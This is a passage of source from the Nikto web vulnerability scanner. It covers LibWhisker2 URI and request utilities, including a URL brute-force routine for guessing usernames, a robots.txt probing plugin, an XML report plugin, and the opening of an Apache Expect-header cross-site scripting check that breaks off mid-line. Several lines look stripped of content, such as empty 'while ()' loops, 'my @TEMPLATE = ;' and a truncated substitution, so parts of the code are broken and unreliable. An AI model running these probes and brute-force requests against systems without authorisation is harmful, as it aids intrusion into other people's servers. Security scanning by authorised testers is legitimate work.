$extra = ''; $extra = $1 if($uri =~ s/([?#].*)$//); # remove params and fragments # parse order/steps as defined in RFC 1808 1 while ( $uri =~ s#/\./#/# || $uri =~ s#//#/# ); $uri =~ s#/\.$#/#; 1 while ( $uri =~ s#[^/]+/\.\./## ); 1 while ( $uri =~ s#^/\.\./#/# ); $uri =~ s#[^/]*/\.\.$##; $uri ||= '/'; return $host . $uri . $extra; } ################################################################# =item B Params: $uri Return: $uri_directory Will take a URI and return the directory base of it, i.e. /rfp/page.php will return /rfp/. =cut sub uri_get_dir { my ( $w, $URL ) = ( 0, shift ); return undef if ( !defined $URL ); $URL = substr( $URL, 0, $w ) if ( ( $w = index( $URL, '#' ) ) >= 0 ); $URL = substr( $URL, 0, $w ) if ( ( $w = index( $URL, '?' ) ) >= 0 ); return $URL if ( substr( $URL, -1, 1 ) eq '/' ); if ( ( $w = rindex( $URL, '/' ) ) >= 0 ) { $URL = substr( $URL, 0, $w + 1 ); } else { $URL = ''; } return $URL; } ################################################################# =item B Params: $uri [, \%param_hash] Return: $stripped_uri This function removes all URI path parameters of the form /blah1;foo=bar/blah2;baz and returns the stripped URI ('/blah1/blah2'). If the optional parameter hash reference is provided, the stripped parameters are saved in the form of 'blah1'=>'foo=bar', 'blah2'=>'baz'. Note: only the last value of a duplicate name is saved into the param_hash, if provided. So a $uri of '/foo;A/foo;B/' will result in a single hash entry of 'foo'=>'B'. =cut sub uri_strip_path_parameters { my ( $uri, $hr ) = @_; my $s = 0; $s++ if ( defined $hr && ref($hr) ); my @p = split( /\//, $uri, -1 ); map { if (s/;(.*)$//) { $$hr{$_} = $1 if ($s); } } @p; return join( '/', @p ); } ################################################################# =item B Params: $parameter_string [, $decode, $multi_flag ] Return: \%parameter_hash This function takes a string in the form of: foo=1&bar=2&baz=3&foo=4 And parses it into a hash. In the above example, the element 'foo' has two values (1 and 4). If $multi_flag is set to 1, then the 'foo' hash entry will hold an anonymous array of both values. Otherwise, the default is to just contain the last value (in this case, '4'). If $decode is set to 1, then normal hex decoding is done on the characters, where needed (both the name and value are decoded). Note: if a URL parameter name appears without a value, then the value will be set to undef. E.g. for the string "foo=1&bar&baz=2", the 'bar' hash element will have an undef value. =cut sub uri_parse_parameters { my ( $str, $decode, $multi ) = @_; my %P; if( $str !~ tr/=&// ){ $P{$str} = undef; return \%P; } $multi ||= 0; $decode ||= 0; foreach ( split( /&/, $str ) ) { my ( $name, $value ) = split( /=/, $_, 2 ); if ($decode) { $name = uri_unescape($name); $value = uri_unescape($value); } if ( defined $P{$name} && $multi ) { if ( ref( $P{$name} ) ) { push @{ $P{$name} }, $value; } else { $P{$name} = [ $P{$name}, $value ]; } } else { $P{$name} = $value; } } return \%P; } ################################################################# =item B Params: $data Return: $encoded_data This function encodes the given $data so it is safe to be used in URIs. =cut sub uri_escape { my $data = shift; return undef if ( !defined $data ); $data =~ s/\%/\%25/g; $data =~ s/([+?&=#;@\\\/])/sprintf("%%%02x",ord($1))/eg; $data =~ tr/ /+/; $data =~ s/([^!-~])/sprintf("%%%02x",ord($1))/eg; return $data; } ################################################################# =item B Params: $encoded_data Return: $data This function decodes the given $data out of URI format. =cut sub uri_unescape { my $data = shift; return undef if ( !defined $data ); $data =~ tr/+/ /; $data =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C",hex($1))/eg; return $data; } ################################################################# ######################################################################## =item B Params: $uri, $depth, \@dir_parts, \@valid, \&func, \%track, \%arrays, \&cfunc Return: nothing This is a special function which is used to recursively-permutate through a given directory listing. This is really only used by whisker, in order to traverse down directories, testing them as it goes. See whisker 2.0 for exact usage examples. =cut # '/', 0, \@dir.split, \@valid, \&func, \%track, \%arrays, \&cfunc sub utils_recperm { my ( $d, $p, $pp, $pn, $r, $fr, $dr, $ar, $cr ) = ( '', shift, shift, @_ ); $p =~ s#/+#/#g; if ( $pp >= @$pn ) { push @$r, $p if &$cr( $$dr{$p} ); } else { my $c = $$pn[$pp]; if ( $c !~ /^\@/ ) { utils_recperm( $p . $c . '/', $pp + 1, @_ ) if ( &$fr( $p . $c . '/' ) ); } else { $c =~ tr/\@//d; if ( defined $$ar{$c} ) { foreach $d ( @{ $$ar{$c} } ) { if ( &$fr( $p . $d . '/' ) ) { utils_recperm( $p . $d . '/', $pp + 1, @_ ); } } } } } } ################################################################# =item B Params: \@array Return: nothing This function will randomize the order of the elements in the given array. =cut sub utils_array_shuffle { # fisher yates shuffle....w00p! my $array = shift; my $i; for ( $i = @$array ; --$i ; ) { my $j = int rand( $i + 1 ); next if $i == $j; @$array[ $i, $j ] = @$array[ $j, $i ]; } } # end array_shuffle, from Perl Cookbook (rock!) ################################################################# =item B Params: [ $size, $chars ] Return: $random_string This function generates a random string between 10 and 20 characters long, or of $size if specified. If $chars is specified, then the random function picks characters from the supplied string. For example, to have a random string of 10 characters, composed of only the characters 'abcdef', then you would run: utils_randstr(10,'abcdef'); The default character string is alphanumeric. =cut sub utils_randstr { my $str; my $drift = shift || ( ( rand() * 10 ) % 10 ) + 10; # 'a'..'z' doesn't seem to work on string assignment :( my $CHARS = shift || 'abcdefghijklmnopqrstuvwxyz' . 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' . '0123456789'; my $L = length($CHARS); for ( 1 .. $drift ) { $str .= substr( $CHARS, ( ( rand() * $L ) % $L ), 1 ); } return $str; } ################################################################# =item B Params: $host, $port Return: $result Quick function to attempt to make a connection to the given host and port. If a connection was successfully made, function will return true (1). Otherwise it returns false (0). Note: this uses standard TCP connections, thus is not recommended for use in port-scanning type applications. Extremely slow. =cut sub utils_port_open { # this should be platform-safe my ( $target, $port ) = @_; return 0 if ( !defined $target || !defined $port ); return 0 if ( !defined $Socket::VERSION ); if ( !( socket( S, PF_INET, SOCK_STREAM, 0 ) ) ) { return 0; } if ( connect( S, sockaddr_in( $port, inet_aton($target) ) ) ) { close(S); return 1; } else { return 0; } } ################################################################# =item B Params: \%hash Return: $number_changed Will lowercase all the header names (but not values) of the given hash. =cut sub utils_lowercase_keys { my $href = shift; return if ( !( defined $href && ref($href) ) ); my $count = 0; while ( my ( $key, $val ) = each %$href ) { if ( $key =~ tr/A-Z// ) { $count++; delete $$href{$key}; $$href{ lc($key) } = $val; } } return $count; } ################################################################# =item B Params: \%hash, $key Return: $value, undef on error or not exist Searches the given hash for the $key (regardless of case), and returns the value. If the return value is placed into an array, the will dereference any multi-value references and return an array of all values. WARNING! In scalar context, $value can either be a single-value scalar or an array reference for multiple scalar values. That means you either need to check the return value and act appropriately, or use an array context (even if you only want a single value). This is very important, even if you know there are no multi-value hash keys. This function may still return an array of multiple values even if all hash keys are single value, since lowercasing the keys could result in multiple keys matching. For example, a hash with the values { 'Foo'=>'a', 'fOo'=>'b' } technically has two keys with the lowercase name 'foo', and so this function will either return an array or array reference with both 'a' and 'b'. =cut sub utils_find_lowercase_key { return utils_find_key( $_[0], $_[1], 1 ); } ################################################################# =item B Params: \%hash, $key Return: $value, undef on error or not exist Searches the given hash for the $key (case-sensitive), and returns the value. If the return value is placed into an array, the will dereference any multi-value references and return an array of all values. =cut sub utils_find_key { my ( $href, $key, $dolower ) = ( shift, shift, shift || 0 ); return undef if ( !( defined $href && ref($href) ) ); return undef if ( !defined $key ); if ($dolower) { $key = lc($key); my ( $k, $v ); my @match; while ( ( $k, $v ) = each %$href ) { if ( lc($k) eq $key ) { if( ref($v) ) { push @match, @$v; } else { push @match, $v; } } } return @match if wantarray(); return \@match if( ~~@match > 1 ); return $match[0]; } else { return @{ $href->{$key} } if ( ref( $href->{$key} ) && wantarray() ); return $href->{$key}; } return undef; } ################################################################# =item B Params: \%hash, $key Return: $number_found Searches the given hash for the $key (regardless of case), and deletes the key out of the hash if found. The function returns the number of keys found and deleted (since multiple keys can exist under the names 'Key', 'key', 'keY', 'KEY', etc.). =cut sub utils_delete_lowercase_key { my ( $href, $key ) = ( shift, lc(shift) ); return undef if ( !( defined $href && ref($href) ) ); return undef if ( !defined $key ); my $deleted = 0; foreach ( keys %$href ) { if ( lc($_) eq $key ) { delete $href->{$_}; $deleted++; } } return $deleted; } ################################################################# =item B Params: \$data [, $resetpos ] Return: $line (undef if no more data) Fetches the next \n terminated line from the given data. Use the optional $resetpos to reset the internal position pointer. Does *NOT* return trialing \n. =cut { my $POS = 0; sub utils_getline { my ( $dr, $rp ) = @_; return undef if ( !( defined $dr && ref($dr) ) ); $POS = $rp if ( defined $rp ); my $where = index( $$dr, "\x0a", $POS ); return undef if ( $where == -1 ); my $str = substr( $$dr, $POS, $where - $POS ); $POS = $where + 1; return $str; } } ################################################################# =item B Params: \$data [, $resetpos ] Return: $line (undef if no more data) Fetches the next \r\n terminated line from the given data. Use the optional $resetpos to reset the internal position pointer. Does *NOT* return trialing \r\n. =cut { my $POS = 0; sub utils_getline_crlf { my ( $dr, $rp ) = @_; return undef if ( !( defined $dr && ref($dr) ) ); $POS = $rp if ( defined $rp ); my $tpos = $POS; while (1) { my $where = index( $$dr, "\x0a", $tpos ); return undef if ( $where == -1 ); if ( substr( $$dr, $where - 1, 1 ) eq "\x0d" ) { my $str = substr( $$dr, $POS, $where - $POS - 1 ); $POS = $where + 1; return $str; } else { $tpos = $where + 1; } } } } ################################################################# =item B Params: $file, \%response Return: 0 on success, 1 on error Saves the data portion of the given whisker %response hash to the indicated file. Can technically save the data portion of a %request hash too. A file is not written if there is no data. Note: LW does not do any special file checking; files are opened in overwrite mode. =cut sub utils_save_page { my ( $file, $hr ) = @_; return 1 if ( !ref($hr) || ref($file) ); return 0 if ( !defined $$hr{'whisker'} || !defined $$hr{'whisker'}->{'data'} ); open( OUT, ">$file" ) || return 1; binmode(OUT); # Stupid Windows print OUT $$hr{'whisker'}->{'data'}; close(OUT); return 0; } ################################################################# =item B Params: $opt_str, \%opt_results Return: 0 on success, 1 on error This function is a general implementation of GetOpts::Std. It will parse @ARGV, looking for the options specified in $opt_str, and will put the results in %opt_results. Behavior/parameter values are similar to GetOpts::Std's getopts(). Note: this function does *not* support long options (--option), option grouping (-opq), or options with immediate values (-ovalue). If an option is indicated as having a value, it will take the next argument regardless. =cut sub utils_getopts { my ( $str, $ref ) = @_; my ( %O, $l ); my @left; return 1 if ( $str =~ tr/-:a-zA-Z0-9//c ); while ( $str =~ m/([a-z0-9]:{0,1})/ig ) { $l = $1; if ( $l =~ tr/://d ) { $O{$l} = 1; } else { $O{$l} = 0; } } while ( $l = shift(@ARGV) ) { push( @left, $l ) && next if ( substr( $l, 0, 1 ) ne '-' ); push( @left, $l ) && next if ( $l eq '-' ); substr( $l, 0, 1 ) = ''; if ( length($l) != 1 ) { %$ref = (); return 1; } if ( $O{$l} == 1 ) { my $x = shift(@ARGV); $$ref{$l} = $x; } else { $$ref{$l} = 1; } } @ARGV = @left; return 0; } ################################################################# =item B Params: $long_text_string [, $crlf, $width ] Return: $formatted_test_string This is a simple function used to format a long line of text for display on a typical limited-character screen, such as a unix shell console. $crlf defaults to "\n", and $width defaults to 76. =cut sub utils_text_wrapper { my ( $out, $w, $str, $crlf, $width ) = ( '', 0, @_ ); $crlf ||= "\n"; $width ||= 76; $str .= $crlf if ( $str !~ /$crlf$/ ); return $str if ( length($str) <= $width ); while ( length($str) > $width ) { my $w1 = rindex( $str, ' ', $width ); my $w2 = rindex( $str, "\t", $width ); if ( $w1 > $w2 ) { $w = $w1; } else { $w = $w2; } if ( $w == -1 ) { $w = $width; } else { substr( $str, $w, 1 ) = ''; } $out .= substr( $str, 0, $w, '' ); $out .= $crlf; } return $out . $str; } ################################################################# =item B Params: \%req, $pre, $post, \@values_in, \@values_out Return: Nothing (adds to @out) Bruteurl will perform a brute force against the host/server specified in %req. However, it will make one request per entry in @in, taking the value and setting $hin{'whisker'}->{'uri'}= $pre.value.$post. Any URI responding with an HTTP 200 or 403 response is pushed into @out. An example of this would be to brute force usernames, putting a list of common usernames in @in, setting $pre='/~' and $post='/'. =cut sub utils_bruteurl { my ( $hin, $upre, $upost, $arin, $arout ) = @_; my ( $U, %hout ); return if ( !( defined $hin && ref($hin) ) ); return if ( !( defined $arin && ref($arin) ) ); return if ( !( defined $arout && ref($arout) ) ); return if ( !defined $upre || length($upre) == 0 ); return if ( !defined $upost || length($upost) == 0 ); http_fixup_request($hin); map { ( $U = $_ ) =~ tr/\r\n//d; next if ( $U eq '' ); if ( !http_do_request( $hin, \%hout, { 'uri' => $upre . $U . $upost } ) ) { if ( $hout{'whisker'}->{'code'} == 200 || $hout{'whisker'}->{'code'} == 403 ) { push( @{$arout}, $U ); } } } @$arin; } ################################################################# =item B Params: $tag_name, \%attributes Return: $tag_string [undef on error] This function takes the $tag_name (like 'A') and a hash full of attributes (like {href=>'http://foo/'}) and returns the constructed HTML tag string (). =cut sub utils_join_tag { my ( $name, $href ) = @_; return undef if ( !defined $name || $name eq '' ); return undef if ( !defined $href || !ref($href) ); my ( $out, $k, $v ) = ( "<$name", '', '' ); while ( ( $k, $v ) = each %$href ) { next if ( $k eq '' ); $out .= " $k"; $out .= "=\"$v\"" if ( defined $v ); } $out .= '>'; return $out; } ################################################################# =item B Params: \%from_request, \%to_request Return: 1 on success, 0 on error This function takes the connection/request-specific values from the given from_request hash, and copies them to the to_request hash. =cut sub utils_request_clone { my ( $from, $to ) = @_; return 0 if ( !defined $from || !ref($from) ); return 0 if ( !defined $to || !ref($to) ); return 0 if ( !defined $from->{whisker}->{MAGIC} ); %$to = (); # copy headers my ( $k, $v ); while ( ( $k, $v ) = each(%$from) ) { next if ( $k eq 'whisker' ); if ( ref($v) ) { @{ $to->{$k} } = @$v; } else { $to->{$k} = $v; } } # copy whisker control values $to->{whisker} = {}; while ( ( $k, $v ) = each( %{ $from->{whisker} } ) ) { if ( ref($v) ) { @{ $to->{whisker}->{$k} } = @$v; } else { $to->{whisker}->{$k} = $v; } } return 1; } ################################################################# =item B Params: \%request [, $hash ] Return: $fingerprint [undef on error] This function constructs a 'fingerprint' of the given request by using a cryptographic hashing function on the constructed original HTTP request. Note: $hash can be 'md5' (default) or 'md4'. =cut sub utils_request_fingerprint { my ( $href, $hash ) = @_; $hash ||= 'md5'; return undef if ( !defined $href || !ref($href) ); return undef if ( !defined $href->{whisker}->{MAGIC} ); my $data = ''; if ( $href->{whisker}->{MAGIC} == 31339 ) { # LW2 request $data = http_req2line($href); if ( $href->{whisker}->{version} ne '0.9' ) { $data .= http_construct_headers($href); $data .= $href->{whisker}->{raw_header_data} if ( defined $href->{whisker}->{raw_header_data} ); $data .= $href->{whisker}->{http_eol}; $data .= $href->{whisker}->{data} if ( defined $href->{whisker}->{data} ); } # http 0.9 support return 'md5:' . md5($data) if ( $hash eq 'md5' ); return 'md4:' . md4($data) if ( $hash eq 'md4' ); } return undef; } ################################################################# =item B Params: \%lwhash Return: $flat_version [undef on error] This function takes a %request or %response libwhisker hash, and creates an approximate flat data string of the original request/ response (i.e. before it was parsed into components and placed into the libwhisker hash). =cut sub utils_flatten_lwhash { my $hr = shift; return undef if ( !defined $hr || !ref($hr) ); my $out; if ( $hr->{whisker}->{MAGIC} == 31339 ) { $out = http_req2line($hr); } elsif ( $hr->{whisker}->{MAGIC} == 31340 ) { $out = http_resp2line($hr); } else { return undef; } $out .= http_construct_headers($hr); $out .= $hr->{whisker}->{http_eol} || "\x0d\x0a"; if ( defined $hr->{whisker}->{data} && length( $hr->{whisker}->{data} ) > 0 ) { $out .= $hr->{whisker}->{data}; } return $out; } ################################################################# sub _utils_carp_common { my ($x,$pack,$m) = (0, shift || '',join('',@_) || '(Unknown error)'); my @s = caller($x++); @s=caller($x++) while(defined $s[0] && ($s[0] eq 'LW2' || $s[0] eq $pack)); return $m if !defined $s[0]; return "$m at $s[1] line $s[2]\n"; } =item B Params: [ $package_name ] Return: nothing This function acts like Carp's carp function. It warn's with the file and line number of user's code which causes a problem. It traces up the call stack and reports the first function that is not in the LW2 or optional $package_name package package. =cut sub utils_carp { warn _utils_carp_common(@_); } =item B Params: [ $package_name ] Return: nothing This function acts like Carp's croak function. It die's with the file and line number of user's code which causes a problem. It traces up the call stack and reports the first function that is not in the LW2 or optional $package_name package package. =cut sub utils_croak { die _utils_carp_common(@_); } =back =head1 SEE ALSO L =head1 COPYRIGHT Copyright 2009 Jeff Forristal =cut 1; nikto-2.1.5/plugins/nikto_robots.plugin0000644000000000000000000001406312024141226016754 0ustar rootroot#VERSION,2.06 # $Id$ ############################################################################### # Copyright (C) 2004 CIRT, Inc. # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; version 2 # of the License only. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to # Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. ############################################################################### # PURPOSE: # Check out the robots.txt file ############################################################################### sub nikto_robots_init { my $id = { name => "robots", full_name => "Robots", author => "Sullo", description => "Checks whether there's anything within the robots.txt file and analyses it for other paths to pass to other scripts.", hooks => { recon => { method => \&nikto_robots, weight => 49, }, }, copyright => "2008 CIRT Inc.", options => { nocheck => "Flag to disable checking entries in robots file.", } }; return $id; } sub nikto_robots { my ($mark, $parameters) = @_; return if $mark->{'terminate'}; my ($code, $content, $errors, $request, $response, $headers_recv) = nfetch($mark, "/robots.txt", "GET", "", "", "", "robots"); if (($code eq 200) || ($code eq $FoF{'okay'}{'response'})) { if (is_404("robots.txt", $content, $code, $headers_recv->{'location'})) { return; } my ($DIRS, $RFILES) = ""; my $DISCTR = 0; my @DOC = split(/\n/, $content); foreach my $line (@DOC) { $line =~ s/(?:^\s+|\s+$)//g; $line = quotemeta($line); if ($line =~ /allow/i) { chomp($line); $line =~ s/\#.*$//; $line =~ s/\s+/ /g; $line =~ s/\t/ /g; $line =~ s/(?:dis)?allow(?:\\:)?(?:\\\s+)?//i; $line =~ s/\/+/\//g; $line =~ s/\\//g; if ($line eq "") { next; } # try to figure out file vs dir... just guess... if (($line !~ /\./) && ($line !~ /\/$/)) { $line .= "/"; } $line = LW2::uri_normalize($line); # figure out dirs/files... my $realdir = validate_and_fix_regex(LW2::uri_get_dir($line)); my $realfile = validate_and_fix_regex($line); $realfile =~ s/^$realdir//; nprint("- robots.txt entry dir:$realdir -- file:$realfile", "d"); if (($realdir ne "") && ($realdir ne "/")) { $DIRS{$realdir}++; } if (($realfile ne "") && ($realfile ne "/")) { $RFILES{$realfile}++; } if (!defined($parameters->{'nocheck'})) { my ($res, $content, $error, $request, $response) = nfetch($mark, $line, "GET", "", "", "Robots: Check for URI"); if (!is_404($line, $content, $res, $response->{'location'}) && ($res ne "403")) { add_vulnerability($mark, "File/dir '$line' in robots.txt returned a non-forbidden or redirect HTTP code ($res)", 999996, 0, "GET", "/$line", $request, $response); } } $DISCTR++; } # end if $line =~ allow } # end foreach my $line (@DOC) # add them to mutate dir/file foreach my $dir (sort keys %DIRS) { my $raw = $dir; $raw =~ s/\\//g; $dir = validate_and_fix_regex($dir); if ($VARIABLES{"\@MUTATEDIRS"} !~ /$dir/) { $VARIABLES{"\@MUTATEDIRS"} .= " $raw"; } # Add to variables if ($dir =~ /cgi/ && $VARIABLES{"\@CGIDIRS"} !~ /$dir/) { $VARIABLES{"\@CGIDIRS"} .= " $raw"; } if ($dir =~ /forum/ && $VARIABLES{"\@NUKE"} !~ /$dir/) { $VARIABLES{"\@NUKE"} .= " $raw"; } if ($dir =~ /pass/ && $VARIABLES{"\@PASSWORDDIRS"} !~ /$dir/) { $VARIABLES{"\@PASSWORDDIRS"} .= " $raw"; } if ($dir =~ /nuke/i && $VARIABLES{"\@NUKE"} !~ /$dir/i) { $VARIABLES{"\@NUKE"} .= " $raw"; } if ($dir =~ /admin/i && $VARIABLES{"\@ADMIN"} !~ /$dir/i) { $VARIABLES{"\@ADMIN"} .= " $raw"; } if ($dir =~ /phpmy/i && $VARIABLES{"\@PHPMYADMIN"} !~ /$dir/i) { $VARIABLES{"\@PHPMYADMIN"} .= " $raw"; } if ($dir =~ /fck/i && $VARIABLES{"\@FCKEDITOR"} !~ /$dir/i) { $VARIABLES{"\@FCKEDITOR"} .= " $raw"; } if ($dir =~ /crystal/i && $VARIABLES{"\@CRYSTALREPORTS"} !~ /$dir/i) { $VARIABLES{"\@CRYSTALREPORTS"} .= " $raw"; } } foreach my $file (sort keys %RFILES) { my $raw = $file; $raw =~ s/\\//g; $file = validate_and_fix_regex($file); if ($VARIABLES{"\@MUTATEFILES"} !~ /$file/) { $VARIABLES{"\@MUTATEFILES"} .= " $raw"; } # Add to variables if ($file =~ /pass/i && $VARIABLES{"\@PASSWORDFILES"} !~ /$file/i) { $VARIABLES{"\@PASSWORDFILES"} .= " $raw"; } } my $msg; if ($DISCTR eq 1) { $msg = "contains $DISCTR entry which should be manually viewed."; } elsif ($DISCTR > 1) { $msg = "contains $DISCTR entries which should be manually viewed."; } else { $msg = "retrieved but it does not contain any 'disallow' entries (which is odd)."; } add_vulnerability($mark, "\"robots.txt\" $msg", 999996, 0, "GET", "/robots.txt", $request, $response); } } 1; nikto-2.1.5/plugins/nikto_report_xml.plugin0000644000000000000000000002075712014752104017650 0ustar rootroot#VERSION,2.05 # $Id: nikto_reports.plugin 125 2009-07-20 21:59:00Z deity $ ############################################################################### # Copyright (C) 2007 CIRT, Inc. # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; version 2 # of the License only. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to # Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. ############################################################################### # PURPOSE: # XML Reporting ############################################################################### sub nikto_report_xml_init { my $id = { name => "report_xml", full_name => "Report as XML", author => "Sullo/Jabra", description => "Produces an XML report.", report_head => \&xml_head, report_host_start => \&xml_host_start, report_host_end => \&xml_host_end, report_item => \&xml_item, report_summary => \&xml_summary, report_close => \&xml_close, report_format => 'xml', copyright => "2008 CIRT Inc." }; # load up the templates now xml_open_templates(); return $id; } sub xml_head { my ($file) = @_; # check for xml headers $header_present = 0; if (-e $file) { open(IN, "<$file") || die print STDERR "+ ERROR: Unable to open '$file' for read: $@\n"; my $linectr = 0; while () { $linectr++; if ($_ =~ /DOCTYPE niktoscan/) { $header_present = 1; last; } if ($linectr > 10) { last; } } close(IN); } open(OUT, ">>$file") || die print STDERR "+ ERROR: Unable to open '$file' for write: $@\n"; # If file doesn't contain a header, write it if (!$header_present) { my $xml = xml_change_vars($TEMPLATES{xml_start}); $xml =~ s/\#NIKTODTD#/$CONFIGFILE{NIKTODTD}/; print OUT "$xml"; } # Return file handle return OUT; } ############################################################################### sub xml_summary { my ($handle, $mark) = @_; my $xml = xml_change_vars($TEMPLATES{'xml_summary'}, $mark); print $handle "$xml\n"; return; } ############################################################################### sub xml_close { my ($handle, $mark) = @_; my $xml = xml_change_vars($TEMPLATES{xml_close}, $mark); print $handle $xml; close($handle); return; } ############################################################################### sub xml_host_start { my ($handle, $mark) = @_; my $xml = xml_change_vars($TEMPLATES{xml_host_head}, $mark); print $handle "$xml\n"; return; } ############################################################################### sub xml_host_end { my ($handle, $mark) = @_; my $xml = xml_change_vars($TEMPLATES{xml_end}, $mark); print $handle "$xml\n"; return; } ############################################################################### sub xml_item { my ($handle, $mark, $item) = @_; my $xml = xml_change_vars($TEMPLATES{xml_host_item}, $mark, $item); print $handle "$xml\n"; return; } ############################################################################### sub xml_open_templates { foreach my $t (dirlist($CONFIGFILE{TEMPLATEDIR}, "xml.*")) { open(T, "<$CONFIGFILE{TEMPLATEDIR}/$t"); my @TEMPLATE = ; close(T); my $T = join("", @TEMPLATE); $t =~ s/\..*$//; $TEMPLATES{$t} = $T; } return; } ############################################################################### sub xml_change_vars { my ($template, $mark, $item) = @_; my %variables; my $protocol = "http"; if ($mark->{ssl}) { $protocol .= "s"; } $variables{"#TEMPL_HCTR#"} = $VARIABLES{'TEMPL_HCTR'}; $variables{"#TEMPL_END#"} = date_disp($mark->{'end_time'}); $variables{"#TEMPL_HOSTNAME#"} = hex_enc($mark->{'hostname'}); $variables{"#TEMPL_HOST_HEADER#"} = hex_enc($mark->{'hostname'}); if (defined $mark->{vhost}) { $variables{"#TEMPL_HOST_HEADER#"} = hex_enc($mark->{'vhost'}); } $variables{"#TEMPL_SSL_INFO#"} = ""; if (defined $mark->{'ssl_cipher'}) { $variables{"#TEMPL_SSL_INFO#"} = "{ssl_cipher}) . "\" issuers=\"" . hex_enc($mark->{ssl_cert_issuer}) . "\" info=\"" . hex_enc($mark->{ssl_cert_subject}) . "\" />"; } $variables{"#TEMPL_IP#"} = simple_enc($mark->{'ip'}); $variables{"#TEMPL_ITEMS_TESTED#"} = $COUNTERS{total_checks}; $variables{"#TEMPL_PORT#"} = $mark->{'port'}; $variables{"#TEMPL_START#"} = date_disp($mark->{'start_time'}); $variables{"#TEMPL_END#"} = date_disp($mark->{'end_time'}); $variables{"#TEMPL_NIKTO_VER#"} = $VARIABLES{'version'}; $variables{"#TEMPL_BANNER#"} = hex_enc($mark->{'banner'}); $variables{"#TEMPL_NIKTO_CLI#"} = hex_enc($CLI{'all_options'}); $variables{"#TEMPL_CTR#"} = $COUNTERS{'total_checks'}; $variables{"#TEMPL_NIKTO_HOSTS_TESTED#"} = $COUNTERS{'hosts_completed'}; $variables{"#TEMPL_ELAPSED#"} = $mark->{'end_time'} - $mark->{'start_time'}; $variables{"#TEMPL_LINK_IP#"} = $protocol . "://" . $mark->{'ip'} . ":" . $mark->{'port'} . $mark->{'root'}; $variables{"#TEMPL_ITEMS_FOUND#"} = $mark->{'total_vulns'}; $variables{"#TEMPL_SCAN_START#"} = localtime($COUNTERS{'scan_start'}); $variables{"#TEMPL_SCAN_END#"} = localtime($COUNTERS{'scan_end'}); $variables{"#TEMPL_SCAN_ELAPSED#"} = $COUNTERS{'scan_elapsed'} . " seconds"; $variables{"#TEMPL_ERRORS#"} = $mark->{'total_errors'}; $variables{"#TEMPL_LINK_NAME#"} = "N/A"; if ($mark->{hostname} ne "") { $variables{"#TEMPL_LINK_NAME#"} = $protocol . "://" . $mark->{'hostname'} . ":" . $mark->{'port'} . $mark->{'root'}; } # do now in case we return early foreach my $var (keys %variables) { $template =~ s/$var/$variables{$var}/g; } if ($item->{'uri'} eq '') { return $template; } $variables{"#ID#"} = $item->{'nikto_id'}; # OSVDB info my $OSVDB = $item->{'osvdb'}; if ($OSVDB !~ /\d+/) { $OSVDB = 0; } $OSVDB_LINK = "http://osvdb.org/$OSVDB"; $variables{"#TEMPL_OSVDB_LINK#"} = $OSVDB_LINK; $variables{"#TEMPL_OSVDB#"} = $OSVDB; # Scanner Messages Handling $variables{"#TEMPL_SMMSG#"} = $item->{'message'}; # Positives Handling if ($template =~ /\#TEMPL_MSG#/) { $variables{"#TEMPL_URI#"} = simple_enc($mark->{'root'} . $item->{'uri'}); $variables{"#TEMPL_MSG#"} = $item->{'message'}; $variables{"#TEMPL_HTTP_METHOD#"} = $item->{'method'}; $variables{"#TEMPL_ITEM_IP_LINK#"} = "$protocol://$variables{\"#TEMPL_IP#\"}:$mark->{port}$variables{\"#TEMPL_URI#\"}"; $variables{"#TEMPL_ITEM_NAME_LINK#"} = ""; if ($mark->{'hostname'} ne "") { $variables{"#TEMPL_ITEM_NAME_LINK#"} = "$protocol://$variables{\"#TEMPL_HOSTNAME#\"}:$mark->{port}$variables{\"#TEMPL_URI#\"}"; } } foreach my $var (keys %variables) { $template =~ s/$var/$variables{$var}/g; } return $template; } ############################################################################### sub hex_enc { my $invar = $_[0] || return; my $outvar; foreach my $c (split(//, $invar)) { my $n = ord($c); if (($n > 127) || ($n < 32) || ($n == 38) || ($n == 60) || ($n == 62) | ($n == 34)) { $outvar .= sprintf '%#x', $n; } else { $outvar .= $c; } } return $outvar; } ############################################################################### sub simple_enc { my $var = $_[0] || return; $var =~ s//>/g; $var =~ s/"/"/g; return $var; } sub nikto_reports { } # so core doesn't freak 1; nikto-2.1.5/plugins/nikto_apache_expect_xss.plugin0000644000000000000000000000360512024141226021132 0ustar rootroot#VERSION,2.04 # $Id$ ############################################################################### # Copyright (C) 2008 CIRT, Inc. # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; version 2 # of the License only. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to # Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. ############################################################################### # PURPOSE: # Test Apache's expect header XSS ############################################################################### sub nikto_apache_expect_xss_init { my $id = { name => "apache_expect_xss", full_name => "Apache Expect XSS", author => "Sullo", description => "Checks whether the web servers has a cross-site scripting vulnerability through the Expect: HTTP header", hooks => { scan => { method => \&nikto_apache_expect_xss, }, }, copyright => "2008 CIRT Inc." }; return $id; } sub nikto_apache_expect_xss { return if $mark->{'terminate'}; my ($mark) = @_; my %headers = ('Expect', ''); my ($code, $content, $errors, $request, $response) = nfetch($mark, "/", "GET", "", \%headers, "", "apache_expect_xss"); if ($content =~ /